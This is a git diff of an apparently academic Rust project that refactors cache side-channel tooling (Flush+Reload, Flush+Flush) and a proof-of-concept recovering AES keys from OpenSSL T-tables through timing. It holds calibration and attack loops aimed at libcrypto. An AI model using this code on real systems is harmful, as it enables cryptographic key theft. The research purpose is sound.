diff --git a/.idea/DendrobatesTinctoriusAzureus.iml b/.idea/DendrobatesTinctoriusAzureus.iml
index 9392cfb..1f78c4a 100644
--- a/.idea/DendrobatesTinctoriusAzureus.iml
+++ b/.idea/DendrobatesTinctoriusAzureus.iml
@@ -32,6 +32,12 @@
+
+
+
+
+
+
diff --git a/Cargo.lock b/Cargo.lock
index d588279..b5872b0 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -4,7 +4,10 @@
name = "aes-t-tables"
version = "0.1.0"
dependencies = [
+ "cache_side_channel",
"cache_utils",
+ "flush_flush",
+ "flush_reload",
"memmap2",
"nix",
"openssl",
@@ -39,6 +42,10 @@ version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
+[[package]]
+name = "basic_timing_cache_channel"
+version = "0.1.0"
+
[[package]]
name = "bit_field"
version = "0.9.0"
@@ -66,6 +73,10 @@ dependencies = [
"bit_field 0.10.1",
]
+[[package]]
+name = "cache_side_channel"
+version = "0.1.0"
+
[[package]]
name = "cache_utils"
version = "0.1.0"
@@ -94,6 +105,16 @@ version = "0.1.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
+[[package]]
+name = "covert_channels_evaluation"
+version = "0.1.0"
+dependencies = [
+ "bit_field 0.10.1",
+ "cache_utils",
+ "rand",
+ "turn_lock",
+]
+
[[package]]
name = "cpuid"
version = "0.1.0"
@@ -122,6 +143,23 @@ version = "1.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
+[[package]]
+name = "flush_flush"
+version = "0.1.0"
+dependencies = [
+ "cache_side_channel",
+ "cache_utils",
+ "nix",
+]
+
+[[package]]
+name = "flush_reload"
+version = "0.1.0"
+dependencies = [
+ "cache_side_channel",
+ "cache_utils",
+]
+
[[package]]
name = "foreign-types"
version = "0.3.2"
@@ -336,6 +374,10 @@ version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
+[[package]]
+name = "turn_lock"
+version = "0.1.0"
+
[[package]]
name = "vcpkg"
version = "0.2.10"
diff --git a/Cargo.toml b/Cargo.toml
index 179c8ed..f6756fc 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -6,6 +6,11 @@ members = [
"cache_utils",
"cpuid",
"aes-t-tables",
+ "covert_channels_evaluation",
+ "cache_side_channel",
+ "flush_reload",
+ "flush_flush",
+ "basic_timing_cache_channel",
"turn_lock",
]
diff --git a/aes-t-tables/Cargo.toml b/aes-t-tables/Cargo.toml
index 295214c..60fc705 100644
--- a/aes-t-tables/Cargo.toml
+++ b/aes-t-tables/Cargo.toml
@@ -13,3 +13,6 @@ cache_utils = { path = "../cache_utils" }
memmap2 = "0.1.0"
rand = "0.7.3"
nix = "0.18.0"
+cache_side_channel = { path = "../cache_side_channel" }
+flush_flush = { path = "../flush_flush" }
+flush_reload = { path = "../flush_reload" }
diff --git a/aes-t-tables/src/lib.rs b/aes-t-tables/src/lib.rs
index 07c13ea..23e6ca3 100644
--- a/aes-t-tables/src/lib.rs
+++ b/aes-t-tables/src/lib.rs
@@ -1,21 +1,21 @@
-#![feature(specialization)]
+//#![feature(specialization)]
#![feature(unsafe_block_in_unsafe_fn)]
#![deny(unsafe_op_in_unsafe_fn)]
use openssl::aes;
use crate::CacheStatus::Miss;
+use cache_side_channel::table_side_channel::TableCacheSideChannel;
+use cache_side_channel::CacheStatus;
use memmap2::Mmap;
use openssl::aes::aes_ige;
use openssl::symm::Mode;
use rand::seq::SliceRandom;
use rand::thread_rng;
use std::collections::HashMap;
-use std::fmt::Debug;
use std::fs::File;
use std::path::Path;
-pub mod naive_flush_and_reload;
// Generic AES T-table attack flow
// Modularisation :
@@ -37,323 +37,11 @@ pub mod naive_flush_and_reload;
// an attacker measurement
// a calibration victim
-#[derive(Debug, PartialEq, Eq, Clone, Copy)]
-pub enum CacheStatus {
- Hit,
- Miss,
-}
-
-#[derive(Debug, PartialEq, Eq, Clone, Copy)]
-pub enum ChannelFatalError {
- Oops,
-}
-
-pub enum SideChannelError {
- NeedRecalibration,
- FatalError(ChannelFatalError),
- AddressNotReady(*const u8),
- AddressNotCalibrated(*const u8),
-}
-
-/*
-pub enum CacheSideChannel {
- SingleAddr,
- MultipleAddr,
-}
-*/
// Access Driven
-pub trait SimpleCacheSideChannel {
- // TODO
-}
-
-pub struct TableAttackResult {
- pub addr: *const u8,
- hit: u32,
- miss: u32,
-}
-
-impl TableAttackResult {
- fn get(&self, cache_status: CacheStatus) -> u32 {
- match cache_status {
- CacheStatus::Hit => self.hit,
- CacheStatus::Miss => self.miss,
- }
- }
-}
-
-pub trait TableCacheSideChannel {
-    //type ChannelFatalError: Debug;
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn calibrate(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError>;
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn attack<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: impl Iterator<Item = &'c *const u8> + Clone,
-        victim: &'b dyn Fn(),
-        num_iteration: u32,
-    ) -> Result<Vec<TableAttackResult>, ChannelFatalError>;
-}
-
-pub trait SingleAddrCacheSideChannel: Debug {
-    //type SingleChannelFatalError: Debug;
-    /// # Safety
-    ///
-    /// addr must be a valid pointer to read.
-    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError>;
-    /// # Safety
-    ///
-    /// addr must be a valid pointer to read.
-    unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>;
-    fn victim_single(&mut self, operation: &dyn Fn());
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn calibrate_single(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError>;
-}
-
-pub trait MultipleAddrCacheSideChannel: Debug {
-    const MAX_ADDR: u32;
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn test<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
-    ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError>;
-
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn prepare<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
-    ) -> Result<(), SideChannelError>;
-    fn victim(&mut self, operation: &dyn Fn());
-
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn calibrate(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError>;
-}
-
-impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
-    default unsafe fn calibrate(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError> {
-        unsafe { self.calibrate_single(addresses) }
-    }
-    //type ChannelFatalError = T::SingleChannelFatalError;
-
-    default unsafe fn attack<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: impl Iterator<Item = &'c *const u8> + Clone,
-        victim: &'b dyn Fn(),
-        num_iteration: u32,
-    ) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
- let mut result = Vec::new();
-
- for addr in addresses {
- let mut hit = 0;
- let mut miss = 0;
- for iteration in 0..100 {
- match unsafe { self.prepare_single(*addr) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
- },
- }
- self.victim_single(victim);
- let r = unsafe { self.test_single(*addr) };
- match r {
- Ok(status) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => panic!(),
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => panic!(),
- },
- }
- }
- for _iteration in 0..num_iteration {
- match unsafe { self.prepare_single(*addr) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
- },
- }
- self.victim_single(victim);
- let r = unsafe { self.test_single(*addr) };
- match r {
- Ok(status) => match status {
- CacheStatus::Hit => {
- hit += 1;
- }
- CacheStatus::Miss => {
- miss += 1;
- }
- },
- Err(e) => match e {
- SideChannelError::NeedRecalibration => panic!(),
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => panic!(),
- },
- }
- }
- result.push(TableAttackResult {
- addr: *addr,
- hit,
- miss,
- });
- }
- Ok(result)
- }
-}
-
// TODO
-impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {
-    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
- let addresses = vec![addr];
- unsafe { self.test(&mut addresses.iter()) }.map(|v| v[0].1)
- }
-
- unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
- let addresses = vec![addr];
- unsafe { self.prepare(&mut addresses.iter()) }
- }
-
- fn victim_single(&mut self, operation: &dyn Fn()) {
- self.victim(operation);
- }
-
-    unsafe fn calibrate_single(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError> {
- unsafe { self.calibrate(addresses) }
- }
-}
-
-// TODO limit number of simultaneous tested address + randomise order ?
-
-impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
-    unsafe fn calibrate(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError> {
-        unsafe { self.calibrate(addresses) }
-    }
-    //type ChannelFatalError = T::MultipleChannelFatalError;
-
-    /// # Safety
-    ///
-    /// addresses must contain only valid pointers to read.
-    unsafe fn attack<'a, 'b, 'c>(
-        &'a mut self,
-        mut addresses: impl Iterator<Item = &'c *const u8> + Clone,
-        victim: &'b dyn Fn(),
-        num_iteration: u32,
-    ) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
- let mut v = Vec::new();
- while let Some(addr) = addresses.next() {
- let mut batch = Vec::new();
- batch.push(*addr);
- let mut hits: HashMap<*const u8, u32> = HashMap::new();
- let mut misses: HashMap<*const u8, u32> = HashMap::new();
- for i in 1..T::MAX_ADDR {
- if let Some(addr) = addresses.next() {
- batch.push(*addr);
- } else {
- break;
- }
- }
- for i in 0..100 {
- // TODO Warmup
- }
- for i in 0..num_iteration {
- match unsafe { MultipleAddrCacheSideChannel::prepare(self, &mut batch.iter()) } {
- Ok(_) => {}
- Err(e) => match e {
- SideChannelError::NeedRecalibration => unimplemented!(),
- SideChannelError::FatalError(e) => return Err(e),
- SideChannelError::AddressNotReady(_addr) => panic!(),
- SideChannelError::AddressNotCalibrated(addr) => {
- eprintln!(
- "Addr: {:p}\n\
- {:#?}",
- addr, self
- );
- unimplemented!()
- }
- },
- }
- MultipleAddrCacheSideChannel::victim(self, victim);
-
- let r = unsafe { MultipleAddrCacheSideChannel::test(self, &mut batch.iter()) }; // Fixme error handling
- match r {
- Err(e) => match e {
- SideChannelError::NeedRecalibration => {
- panic!();
- }
- SideChannelError::FatalError(e) => {
- return Err(e);
- }
- _ => {
- panic!();
- }
- },
- Ok(vector) => {
- for (addr, status) in vector {
- match status {
- CacheStatus::Hit => {
- *hits.entry(addr).or_default() += 1;
- }
- CacheStatus::Miss => {
- *misses.entry(addr).or_default() += 1;
- }
- }
- }
- }
- }
- }
-
- for addr in batch {
- v.push(TableAttackResult {
- addr,
- hit: *hits.get(&addr).unwrap_or(&0u32),
- miss: *misses.get(&addr).unwrap_or(&0u32),
- })
- }
- }
- Ok(v)
- }
-}
-
pub struct AESTTableParams<'a> {
pub num_encryptions: u32,
pub key: [u8; 32],
@@ -361,6 +49,8 @@ pub struct AESTTableParams<'a> {
pub te: [isize; 4],
}
+const KEY_BYTE_TO_ATTACK: usize = 0;
+
/// # Safety
///
/// te need to refer to the correct t tables offset in the openssl library at path.
@@ -383,9 +73,6 @@ pub unsafe fn attack_t_tables_poc(
    let key_struct = aes::AesKey::new_encrypt(&parameters.key).unwrap();
- //let mut plaintext = [0u8; 16];
- //let mut result = [0u8; 16];
-
    let mut timings: HashMap<*const u8, HashMap<u8, u32>> = HashMap::new();
let mut addresses: Vec<*const u8> = parameters
@@ -409,13 +96,12 @@ pub unsafe fn attack_t_tables_poc(
}
for b in (u8::min_value()..=u8::max_value()).step_by(16) {
- //plaintext[0] = b;
eprintln!("Probing with b = {:x}", b);
// fixme magic numbers
let victim = || {
let mut plaintext = [0u8; 16];
- plaintext[0] = b;
+ plaintext[KEY_BYTE_TO_ATTACK] = b;
for byte in plaintext.iter_mut().skip(1) {
*byte = rand::random();
}
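
Note on the probe loop above: b advances in steps of 16 (hence the "fixme magic numbers" comment) because, on the usual layout, T-table entries are 4-byte words and a 64-byte cache line therefore covers 16 consecutive entries, so a first-round access Te[p[0] ^ k[0]] can only leak the high nibble of p[0] ^ k[0]. A small illustrative sketch of that mapping (not part of the patch; entry and line sizes are assumptions):

    // Which cache line of a T table a first-round AES lookup touches.
    // Illustrative only: assumes u32 entries and 64-byte cache lines.
    fn touched_line(p0: u8, k0: u8) -> usize {
        const ENTRY_SIZE: usize = 4; // T-table entries are u32
        const LINE_SIZE: usize = 64; // one cache line = 16 entries
        ((p0 ^ k0) as usize * ENTRY_SIZE) / LINE_SIZE
    }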
diff --git a/aes-t-tables/src/main.rs b/aes-t-tables/src/main.rs
index 7f07565..8aa3ba4 100644
--- a/aes-t-tables/src/main.rs
+++ b/aes-t-tables/src/main.rs
@@ -1,446 +1,11 @@
#![feature(unsafe_block_in_unsafe_fn)]
#![deny(unsafe_op_in_unsafe_fn)]
-use aes_t_tables::SideChannelError::{AddressNotCalibrated, AddressNotReady};
-use aes_t_tables::{
- attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError,
- MultipleAddrCacheSideChannel, SideChannelError, SingleAddrCacheSideChannel,
-};
-use cache_utils::calibration::{
- get_cache_slicing, only_flush, CalibrateOperation2T, CalibrationOptions, HistParams, Verbosity,
- CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER,
-};
-use cache_utils::{find_core_per_socket, flush, maccess, noop};
-use std::collections::{HashMap, HashSet};
-use std::path::Path;
-
-use aes_t_tables::naive_flush_and_reload::*;
-
-type VPN = usize;
-type Slice = u8;
-
-use cache_utils::calibration::calibrate_fixed_freq_2_thread;
-use cache_utils::complex_addressing::CacheSlicing;
-use core::fmt;
-use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet};
+use aes_t_tables::{attack_t_tables_poc, AESTTableParams};
+use flush_flush::{FlushAndFlush, SingleFlushAndFlush};
+use flush_reload::naive::*;
+use nix::sched::sched_setaffinity;
use nix::unistd::Pid;
-use std::fmt::{Debug, Formatter};
-use std::i8::MAX; // TODO
-
-#[derive(Debug)]
-struct Threshold {
- pub value: u64,
- pub miss_faster_than_hit: bool,
-}
-
-impl Threshold {
- pub fn is_hit(&self, time: u64) -> bool {
- self.miss_faster_than_hit && time >= self.value
- || !self.miss_faster_than_hit && time < self.value
- }
-}
-
-struct FlushAndFlush {
-    thresholds: HashMap<VPN, HashMap<Slice, Threshold>>,
- addresses_ready: HashSet<*const u8>,
- slicing: CacheSlicing,
- original_affinities: CpuSet,
-}
-
-#[derive(Debug)]
-struct SingleFlushAndFlush(FlushAndFlush);
-
-impl SingleFlushAndFlush {
-    pub fn new() -> Option<Self> {
- FlushAndFlush::new().map(|ff| SingleFlushAndFlush(ff))
- }
-}
-
-impl SingleAddrCacheSideChannel for SingleFlushAndFlush {
-    unsafe fn test_single(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
- unsafe { self.0.test_single(addr) }
- }
-
- unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> {
- unsafe { self.0.prepare_single(addr) }
- }
-
- fn victim_single(&mut self, operation: &dyn Fn()) {
- self.0.victim_single(operation)
- }
-
-    unsafe fn calibrate_single(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError> {
- unsafe { self.0.calibrate_single(addresses) }
- }
-}
-
-// Current issue : hash function trips borrow checker.
-// Also need to finish implementing the calibration logic
-
-impl FlushAndFlush {
-    pub fn new() -> Option<Self> {
- if let Some(slicing) = get_cache_slicing(find_core_per_socket()) {
- if !slicing.can_hash() {
- return None;
- }
-
- let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
-
- let ret = Self {
- thresholds: Default::default(),
- addresses_ready: Default::default(),
- slicing,
- original_affinities: old,
- };
- Some(ret)
- } else {
- None
- }
- }
-
- fn get_slice(&self, addr: *const u8) -> Slice {
- self.slicing.hash(addr as usize).unwrap()
- }
-}
-
-impl Drop for FlushAndFlush {
- fn drop(&mut self) {
- sched_setaffinity(Pid::from_raw(0), &self.original_affinities).unwrap();
- }
-}
-
-impl Debug for FlushAndFlush {
- fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result {
- f.debug_struct("FlushAndFlush")
- .field("thresholds", &self.thresholds)
- .field("addresses_ready", &self.addresses_ready)
- .field("slicing", &self.slicing)
- .finish()
- }
-}
-
-const PAGE_LEN: usize = 1 << 12;
-
-fn get_vpn<T>(p: *const T) -> usize {
- (p as usize) & (!(PAGE_LEN - 1)) // FIXME
-}
-
-fn cum_sum(vector: &[u32]) -> Vec<u32> {
- let len = vector.len();
- let mut res = vec![0; len];
- res[0] = vector[0];
- for i in 1..len {
- res[i] = res[i - 1] + vector[i];
- }
- assert_eq!(len, res.len());
- assert_eq!(len, vector.len());
- res
-}
-
-impl MultipleAddrCacheSideChannel for FlushAndFlush {
- const MAX_ADDR: u32 = 3;
-
-    unsafe fn test<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
-    ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError> {
- let mut result = Vec::new();
- let mut tmp = Vec::new();
- let mut i = 0;
- for addr in addresses {
- i += 1;
- let t = unsafe { only_flush(*addr) };
- tmp.push((addr, t));
- if i == Self::MAX_ADDR {
- break;
- }
- }
- for (addr, time) in tmp {
- if !self.addresses_ready.contains(&addr) {
- return Err(AddressNotReady(*addr));
- }
- let vpn: VPN = (*addr as usize) & (!0xfff); // FIXME
- let slice = self.get_slice(*addr);
- let threshold = &self.thresholds[&vpn][&slice];
- // refactor this into a struct threshold method ?
- if threshold.is_hit(time) {
- result.push((*addr, CacheStatus::Hit))
- } else {
- result.push((*addr, CacheStatus::Miss))
- }
- }
- Ok(result)
- }
-
-    unsafe fn prepare<'a, 'b, 'c>(
-        &'a mut self,
-        addresses: &'b mut (impl Iterator<Item = &'c *const u8> + Clone),
-    ) -> Result<(), SideChannelError> {
- use core::arch::x86_64 as arch_x86;
- let mut i = 0;
- let addresses_cloned = addresses.clone();
- for addr in addresses_cloned {
- i += 1;
- let vpn: VPN = get_vpn(*addr);
- let slice = self.get_slice(*addr);
- if self.addresses_ready.contains(&addr) {
- continue;
- }
- if !self.thresholds.contains_key(&vpn) || !self.thresholds[&vpn].contains_key(&slice) {
- return Err(AddressNotCalibrated(*addr));
- }
- if i == Self::MAX_ADDR {
- break;
- }
- }
- i = 0;
- for addr in addresses {
- i += 1;
- unsafe { flush(*addr) };
- self.addresses_ready.insert(*addr);
- if i == Self::MAX_ADDR {
- break;
- }
- }
- unsafe { arch_x86::_mm_mfence() };
- Ok(())
- }
-
- fn victim(&mut self, operation: &dyn Fn()) {
- operation(); // TODO use a different helper core ?
- }
-
-    unsafe fn calibrate(
-        &mut self,
-        addresses: impl IntoIterator<Item = *const u8> + Clone,
-    ) -> Result<(), ChannelFatalError> {
-        let mut pages = HashMap::<VPN, HashSet<*const u8>>::new();
- for addr in addresses {
- let page = get_vpn(addr);
- pages.entry(page).or_insert_with(HashSet::new).insert(addr);
- }
-
- let core_per_socket = find_core_per_socket();
-
- let operations = [
- CalibrateOperation2T {
-                prepare: maccess::<u8>,
- op: only_flush,
- name: "clflush_remote_hit",
- display_name: "clflush remote hit",
- },
- CalibrateOperation2T {
-                prepare: noop::<u8>,
- op: only_flush,
- name: "clflush_miss",
- display_name: "clflush miss",
- },
- ];
- const HIT_INDEX: usize = 0;
- const MISS_INDEX: usize = 1;
-
- // Generate core iterator
- let mut core_pairs: Vec<(usize, usize)> = Vec::new();
-
- let old = sched_getaffinity(Pid::from_raw(0)).unwrap();
-
- for i in 0..CpuSet::count() {
- if old.is_set(i).unwrap() {
- core_pairs.push((i, i));
- }
- }
-
- // Probably needs more metadata
-        let mut per_core: HashMap<usize, HashMap<VPN, HashMap<Slice, (Threshold, f32)>>> =
-            HashMap::new();
-
-        let mut core_averages: HashMap<usize, (f32, u32)> = HashMap::new();
-
- for (page, _) in pages {
- let p = page as *const u8;
- let r = unsafe {
- calibrate_fixed_freq_2_thread(
- p,
- 64, // FIXME : MAGIC
- PAGE_LEN as isize, // MAGIC
- &mut core_pairs.clone().into_iter(),
- &operations,
- CalibrationOptions {
- hist_params: HistParams {
- bucket_number: CFLUSH_BUCKET_NUMBER,
- bucket_size: CFLUSH_BUCKET_SIZE,
- iterations: CFLUSH_NUM_ITER << 1,
- },
- verbosity: Verbosity::NoOutput,
- optimised_addresses: true,
- },
- core_per_socket,
- )
- };
-
- /* TODO refactor a good chunk of calibration result analysis to make thresholds in a separate function
- Generating Cumulative Sums and then using that to compute error count for each possible threshold is a recurring joke.
- It might be worth in a second time to refactor this to handle more generic strategies (such as double thresholds)
- What about handling non attributes values (time values that are not attributed as hit or miss)
- */
-
- for result2t in r {
- if result2t.main_core != result2t.helper_core {
- panic!("Unexpected core numbers");
- }
- let core = result2t.main_core;
- match result2t.res {
- Err(e) => panic!("Oops: {:#?}", e),
- Ok(results_1t) => {
- for r1t in results_1t {
- let offset = r1t.offset;
- let addr = unsafe { p.offset(offset) };
- let slice = self.get_slice(addr);
- let miss_hist = &r1t.histogram[MISS_INDEX];
- let hit_hist = &r1t.histogram[HIT_INDEX];
- if miss_hist.len() != hit_hist.len() {
-                            panic!("Malformed results");
- }
- let len = miss_hist.len();
- let miss_cum_sum = cum_sum(miss_hist);
- let hit_cum_sum = cum_sum(hit_hist);
- let miss_total = miss_cum_sum[len - 1];
- let hit_total = hit_cum_sum[len - 1];
-
- // Threshold is less than equal => miss, strictly greater than => hit
- let mut error_miss_less_than_hit = vec![0; len - 1];
- // Threshold is less than equal => hit, strictly greater than => miss
- let mut error_hit_less_than_miss = vec![0; len - 1];
-
- let mut min_error_hlm = u32::max_value();
- let mut min_error_mlh = u32::max_value();
-
- for i in 0..(len - 1) {
- error_hit_less_than_miss[i] =
- miss_cum_sum[i] + (hit_total - hit_cum_sum[i]);
- error_miss_less_than_hit[i] =
- hit_cum_sum[i] + (miss_total - miss_cum_sum[i]);
-
- if error_hit_less_than_miss[i] < min_error_hlm {
- min_error_hlm = error_hit_less_than_miss[i];
- }
- if error_miss_less_than_hit[i] < min_error_mlh {
- min_error_mlh = error_miss_less_than_hit[i];
- }
- }
-
- let hlm = min_error_hlm < min_error_mlh;
-
- let (errors, min_error) = if hlm {
- (&error_hit_less_than_miss, min_error_hlm)
- } else {
- (&error_miss_less_than_hit, min_error_mlh)
- };
-
- let mut potential_thresholds = Vec::new();
-
- for i in 0..errors.len() {
- if errors[i] == min_error {
- let num_true_hit;
- let num_false_hit;
- let num_true_miss;
- let num_false_miss;
- if hlm {
- num_true_hit = hit_cum_sum[i];
- num_false_hit = miss_cum_sum[i];
- num_true_miss = miss_total - num_false_hit;
- num_false_miss = hit_total - num_true_hit;
- } else {
- num_true_miss = miss_cum_sum[i];
- num_false_miss = hit_cum_sum[i];
- num_true_hit = hit_total - num_false_miss;
- num_false_hit = miss_total - num_true_miss;
- }
- potential_thresholds.push((
- i,
- num_true_hit,
- num_false_hit,
- num_true_miss,
- num_false_miss,
- min_error as f32 / (hit_total + miss_total) as f32,
- ));
- }
- }
-
- let index = (potential_thresholds.len() - 1) / 2;
- let (threshold, _, _, _, _, error_rate) = potential_thresholds[index];
- // insert in per_core
- if per_core
- .entry(core)
- .or_insert_with(HashMap::new)
- .entry(page)
- .or_insert_with(HashMap::new)
- .insert(
- slice,
- (
- Threshold {
- value: threshold as u64, // FIXME the bucket to time conversion
- miss_faster_than_hit: !hlm,
- },
- error_rate,
- ),
- )
- .is_some()
- {
- panic!("Duplicate slice result");
- }
- let core_average = core_averages.get(&core).unwrap_or(&(0.0, 0));
- let new_core_average =
- (core_average.0 + error_rate, core_average.1 + 1);
- core_averages.insert(core, new_core_average);
- }
- }
- }
- }
- }
-
- // We now have a HashMap associating stuffs to cores, iterate on it and select the best.
- let mut best_core = 0;
-
- let mut best_error_rate = {
- let ca = core_averages[&0];
- ca.0 / ca.1 as f32
- };
- for (core, average) in core_averages {
- let error_rate = average.0 / average.1 as f32;
- if error_rate < best_error_rate {
- best_core = core;
- best_error_rate = error_rate;
- }
- }
- let mut thresholds = HashMap::new();
- println!("Best core: {}, rate: {}", best_core, best_error_rate);
- let tmp = per_core.remove(&best_core).unwrap();
- for (page, per_page) in tmp {
- let page_entry = thresholds.entry(page).or_insert_with(HashMap::new);
- for (slice, per_slice) in per_page {
- println!(
- "page: {:x}, slice: {}, threshold: {:?}, error_rate: {}",
- page, slice, per_slice.0, per_slice.1
- );
- page_entry.insert(slice, per_slice.0);
- }
- }
- self.thresholds = thresholds;
- println!("{:#?}", self.thresholds);
-
- // TODO handle error better for affinity setting and other issues.
-
- self.addresses_ready.clear();
-
- let mut cpuset = CpuSet::new();
- cpuset.set(best_core).unwrap();
- sched_setaffinity(Pid::from_raw(0), &cpuset).unwrap();
- Ok(())
- }
-}
+use std::path::Path;
const KEY2: [u8; 32] = [
0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc,
@@ -452,12 +17,12 @@ const KEY2: [u8; 32] = [
// 00000000001cc080 r Te1
// 00000000001cbc80 r Te2
// 00000000001cb880 r Te3
-const TE_CYBER_COBAYE : [isize;4] = [0x1cc480, 0x1cc080, 0x1cbc80, 0x1cb880];
+const TE_CYBER_COBAYE: [isize; 4] = [0x1cc480, 0x1cc080, 0x1cbc80, 0x1cb880];
-const TE_CITRON_VERT : [isize; 4] = [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140];
+const TE_CITRON_VERT: [isize; 4] = [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140];
fn main() {
- let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
+ let openssl_path = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
let mut side_channel = NaiveFlushAndReload::from_threshold(220);
let te = TE_CITRON_VERT;
unsafe {
@@ -467,7 +32,7 @@ fn main() {
num_encryptions: 1 << 12,
key: [0; 32],
te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
+ openssl_path: &openssl_path,
},
)
}; /**/
@@ -478,36 +43,35 @@ fn main() {
num_encryptions: 1 << 12,
key: KEY2,
te: te,
- openssl_path: &open_sslpath,
+ openssl_path: &openssl_path,
},
)
};
- {
- let mut side_channel_ff = FlushAndFlush::new().unwrap();
- unsafe {
- attack_t_tables_poc(
- &mut side_channel_ff,
- AESTTableParams {
- num_encryptions: 1 << 12,
- key: [0; 32],
- te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
- },
- )
- };
- }
- {
- let mut side_channel_ff = SingleFlushAndFlush::new().unwrap();
- unsafe {
- attack_t_tables_poc(
- &mut side_channel_ff,
- AESTTableParams {
- num_encryptions: 1 << 12,
- key: KEY2,
- te: te, // adjust me (should be in decreasing order)
- openssl_path: &open_sslpath,
- },
- )
- };
- }
+ let (mut side_channel_ff, old, core) = FlushAndFlush::new_any_single_core().unwrap();
+ unsafe {
+ attack_t_tables_poc(
+ &mut side_channel_ff,
+ AESTTableParams {
+ num_encryptions: 1 << 12,
+ key: [0; 32],
+ te: te, // adjust me (should be in decreasing order)
+ openssl_path: &openssl_path,
+ },
+ )
+ };
+
+ sched_setaffinity(Pid::from_raw(0), &old);
+ let (mut side_channel_ff, old, core) = SingleFlushAndFlush::new_any_single_core().unwrap();
+ unsafe {
+ attack_t_tables_poc(
+ &mut side_channel_ff,
+ AESTTableParams {
+ num_encryptions: 1 << 12,
+ key: KEY2,
+ te: te, // adjust me (should be in decreasing order)
+ openssl_path: &openssl_path,
+ },
+ )
+ };
+ sched_setaffinity(Pid::from_raw(0), &old);
}
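
Aside: new_any_single_core() comes from the reworked flush_flush crate and, as used here, is assumed to return the constructed channel, the previous affinity mask, and the chosen core, leaving main() to restore affinity by hand after each attack. A minimal RAII sketch of that save/restore pattern, assuming the nix 0.18 CpuSet API already used elsewhere in this patch:

    // A sketch (not in the patch) of the affinity save/restore that main()
    // now performs manually around each FlushAndFlush channel.
    use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet};
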